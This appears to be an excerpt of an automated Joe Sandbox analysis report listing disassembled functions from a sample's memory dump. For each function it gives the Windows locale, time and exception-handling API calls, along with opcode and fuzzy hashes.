                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                                                                            • Opcode ID: 52d8eff1c36bdb30ced7fe7556a4ef67e079b54a0f27c2858695ff5c69727b71
                                                                                                                                                                                            • Instruction ID: 09c67194e47768126450cc5bd5803ac7fcf68dbb5a6a5ed28f18ee8ddf7db285
                                                                                                                                                                                            • Opcode Fuzzy Hash: 52d8eff1c36bdb30ced7fe7556a4ef67e079b54a0f27c2858695ff5c69727b71
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B21F5E2A30106A6EB348F54D908B9773A6FB42B50F168064EA0EC7210E7B2DDE2C350
                                                                                                                                                                                            Function 00239585 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 002313A9: GetLastError.KERNEL32(00000000,00000000,00237270), ref: 002313AD
                                                                                                                                                                                              • Part of subcall function 002313A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0023144F
                                                                                                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0023968D
                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 002396CB
                                                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 002396DE
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00239726
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00239741
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 415426439-0
                                                                                                                                                                                            • Opcode ID: cde53c060e7e5aa3c268874fe1a6a5ad50fb5bd7a9852bb19585b59b6f0066eb
                                                                                                                                                                                            • Instruction ID: 111f1a671d0787e319e60c43c3ae719b8da1485f7477eb4177169df0369ba19b
                                                                                                                                                                                            • Opcode Fuzzy Hash: cde53c060e7e5aa3c268874fe1a6a5ad50fb5bd7a9852bb19585b59b6f0066eb
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F518EF1A20206AFDB10EFA5DC45AAEB7BCAF06700F144469F504EB190DBB099A4CF61
                                                                                                                                                                                            Function 00238BF9 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 256COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 002313A9: GetLastError.KERNEL32(00000000,00000000,00237270), ref: 002313AD
                                                                                                                                                                                              • Part of subcall function 002313A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0023144F
                                                                                                                                                                                            • GetACP.KERNEL32(?,?,?,?,?,?,0022D8F1,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00238CB8
                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0022D8F1,?,?,?,00000055,?,-00000050,?,?), ref: 00238CEF
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00238E54
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                                                            • String ID: utf8
                                                                                                                                                                                            • API String ID: 607553120-905460609
                                                                                                                                                                                            • Opcode ID: 30ef539e7a798e9c22faaf7315510b34aebb49f0ffa25e692dcbbcc544389893
                                                                                                                                                                                            • Instruction ID: 527b76f1aae921193706e35001f6a46bbef212821c5f9663d92b85057ae0091b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 30ef539e7a798e9c22faaf7315510b34aebb49f0ffa25e692dcbbcc544389893
                                                                                                                                                                                            • Instruction Fuzzy Hash: EC71E7F2620307AADB29AF74CC46BAA73A8EF15710F14446AF505DF1C1EF70E9648B61
                                                                                                                                                                                            Function 00228960 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b54f330be523bf74fb6e165f179a1ee627a2c41003d33122c132f8584647ece6
                                                                                                                                                                                            • Instruction ID: d5c108d0e1415603f0041d0042ce67a8f46f166363ee73421c36a35c3737c177
                                                                                                                                                                                            • Opcode Fuzzy Hash: b54f330be523bf74fb6e165f179a1ee627a2c41003d33122c132f8584647ece6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 53024D71E1122AABDF14CFA8D8807AEF7B1FF48314F14826AD915E7380DB31A955CB90
                                                                                                                                                                                            Function 0021D3D0 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0021D3DC
                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0021D4A8
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0021D4C1
                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0021D4CB
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 254469556-0
                                                                                                                                                                                            • Opcode ID: fe2d7500e417b5aee4a195a61c5ef386176006161da175618b6b636c187539f8
                                                                                                                                                                                            • Instruction ID: 83bc0a3d9218c853a8790e4924c636eda81a2294b187decadd3c25233ec9a815
                                                                                                                                                                                            • Opcode Fuzzy Hash: fe2d7500e417b5aee4a195a61c5ef386176006161da175618b6b636c187539f8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 77310775D01228DBDB20EFA4D9897CDBBB8BF18300F1041AAE40CAB250E7719A84CF45
                                                                                                                                                                                            Function 00232B10 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 408timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00232F55,00000000,00000000,00000000), ref: 00232E14
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InformationTimeZone
                                                                                                                                                                                            • String ID: U/#$]/#
                                                                                                                                                                                            • API String ID: 565725191-1733638092
                                                                                                                                                                                            • Opcode ID: 97956425083656ec42fcf562afffea0d065d3f030354fa54de2acd466812b9db
                                                                                                                                                                                            • Instruction ID: 9f2ea0c7efffebaeb111fb704213fe46da83dd7ccf19b479fdccf245b4260f09
                                                                                                                                                                                            • Opcode Fuzzy Hash: 97956425083656ec42fcf562afffea0d065d3f030354fa54de2acd466812b9db
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BC14BF1D20226EBDB10AFA4DC06ABE77B9EF04710F244056F905EB291E7709E65CB94
                                                                                                                                                                                            Function 00239020 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 002313A9: GetLastError.KERNEL32(00000000,00000000,00237270), ref: 002313AD
                                                                                                                                                                                              • Part of subcall function 002313A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0023144F
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00239074
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002390BE
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00239184
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 661929714-0
                                                                                                                                                                                            • Opcode ID: 8fc0381ee7472fe74d2751ad7fad9cfcea0cc335630eb49025be3bf814b5432c
                                                                                                                                                                                            • Instruction ID: 5bc62a13734acf7b09cc00c6a0163d6e8cb4b290e53fd727a8ee9ec9c4983bbb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8fc0381ee7472fe74d2751ad7fad9cfcea0cc335630eb49025be3bf814b5432c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0961A5B1520607AFDB249F28CC96BBAB7A8EF46300F144079ED09D6681E7B4D9E5CF50
                                                                                                                                                                                            Function 0022B6EC Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0022B7E4
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0022B7EE
                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 0022B7FB
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                            • Opcode ID: d59f1e320c4a6e31a41e688241f8f050737505263eeeb64634a341bd5c004805
                                                                                                                                                                                            • Instruction ID: a0ba4b2e998bedff55d3f3077d2517ec02cfb06fca237f73afb064dcb458f913
                                                                                                                                                                                            • Opcode Fuzzy Hash: d59f1e320c4a6e31a41e688241f8f050737505263eeeb64634a341bd5c004805
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8131D274911229ABCB21DF64E889BCCBBB8BF18310F5041EAE40CA6261E7709B958F55
                                                                                                                                                                                            Function 00224EC6 Relevance: 3.0, APIs: 2, Instructions: 44timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,002052B9,00000000), ref: 00224EDB
                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00224EFA
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1518329722-0
                                                                                                                                                                                            • Opcode ID: 611302253a0291f7d5107e31756f922e57d122ac0c47b67eeb6f4b0e60dc66a3
                                                                                                                                                                                            • Instruction ID: 7cad87ea94091e1394a2907381a2053edbbbbbc17a82e12fcd5ee0c448136962
                                                                                                                                                                                            • Opcode Fuzzy Hash: 611302253a0291f7d5107e31756f922e57d122ac0c47b67eeb6f4b0e60dc66a3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 64F02DB1A102257B4724EFADEA0489EBEE9EFC57707254155F809D3754E570DD01C790
                                                                                                                                                                                            Function 002130A2 Relevance: 2.9, Strings: 2, Instructions: 397COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Z !$Z !
                                                                                                                                                                                            • API String ID: 0-1985138166
                                                                                                                                                                                            • Opcode ID: 715712f29d670a95aff59f5fba2e1e57a807b9476c7315398adea803938ab135
                                                                                                                                                                                            • Instruction ID: 4fd8f7fe35af3485c1d6b5ec003bd90c52860ba49f189816d69bc42c6996755d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 715712f29d670a95aff59f5fba2e1e57a807b9476c7315398adea803938ab135
                                                                                                                                                                                            • Instruction Fuzzy Hash: DBF12972E1021A9FCF08CFA8D991AEDB7F2BF98310F248169E455A7344D734AE55CB60
                                                                                                                                                                                            Function 00202D56 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                                                            • Opcode ID: 295db234734d761d94158b5f97da22d78615a2e368034af9bd1b703066b22697
                                                                                                                                                                                            • Instruction ID: 0acb8add55f6b7049665ceac611073384be5f3bdb285d2620bf15055e7a7532d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 295db234734d761d94158b5f97da22d78615a2e368034af9bd1b703066b22697
                                                                                                                                                                                            • Instruction Fuzzy Hash: D042CE71A10A56DFCB19CF69C4806A9FBF1FF08304F18816AD459E7B82D734A9A5CF80
                                                                                                                                                                                            Function 0023AA6E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0023AA69,?,?,00000008,?,?,0023FA4F,00000000), ref: 0023AC9B
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                                                                            • Opcode ID: 2b19202797d66fc3128c8a7eb4b72b630d6b0918ddb7299b2cfce1c8d29c3d33
                                                                                                                                                                                            • Instruction ID: 455174a3d0d06aba5a52dc8374dc63ddd7308eae8e2db86bcad727e8bc6409eb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b19202797d66fc3128c8a7eb4b72b630d6b0918ddb7299b2cfce1c8d29c3d33
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3CB19E71220609CFD719CF28C48AB657BE1FF05364F258669E8DACF2A1C335D9A2CB41
                                                                                                                                                                                            Function 0021D1DF Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0021D1F5
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2325560087-0
                                                                                                                                                                                            • Opcode ID: 009077de63503df796a9847a9c079f3b5d3c31ad6d36fec90a9c93878d56ad63
                                                                                                                                                                                            • Instruction ID: cdc3130a18059cb3d74de2cd0beec2bbc8ce1d4c18313a5b426a68eb88603701
                                                                                                                                                                                            • Opcode Fuzzy Hash: 009077de63503df796a9847a9c079f3b5d3c31ad6d36fec90a9c93878d56ad63
                                                                                                                                                                                            • Instruction Fuzzy Hash: 18517B71A21206CFEB18CF64E9897AABBF0FB54311F24846AD811EB291E774D990CF51
                                                                                                                                                                                            Function 0023576B Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ff8594604197e8e3b63ed52ede3cbbcc7108b6caa100b9a05baff67a65b3a9b2
                                                                                                                                                                                            • Instruction ID: a99af515be5b5971857e38dc857514850231f42a5dfbdab971dd2b1f8d8f166d
                                                                                                                                                                                            • Opcode Fuzzy Hash: ff8594604197e8e3b63ed52ede3cbbcc7108b6caa100b9a05baff67a65b3a9b2
                                                                                                                                                                                            • Instruction Fuzzy Hash: FF41C4B5C1562DAFDF20DF69CC89AAABBB9AF45300F1442D9E40DE3201DA349E948F50
                                                                                                                                                                                            Function 0022AE84 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                            • API String ID: 0-4108050209
                                                                                                                                                                                            • Opcode ID: 349938bc103d0dec82b1fd7c3eddd669f8bb5247fb9641501179edb1743633b0
                                                                                                                                                                                            • Instruction ID: f14e03b53865b882a239a22181db6bbb215c82edf234b3761bc9d840bbb819b3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 349938bc103d0dec82b1fd7c3eddd669f8bb5247fb9641501179edb1743633b0
                                                                                                                                                                                            • Instruction Fuzzy Hash: 05C13270920727AFCB26CFE8E69067AB7B1EF05300F140619E46687E91C376AD75CB52
                                                                                                                                                                                            Function 00239280 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 002313A9: GetLastError.KERNEL32(00000000,00000000,00237270), ref: 002313AD
                                                                                                                                                                                              • Part of subcall function 002313A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0023144F
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002392D4
                                                                                                                                                                                            Memory Dump Source
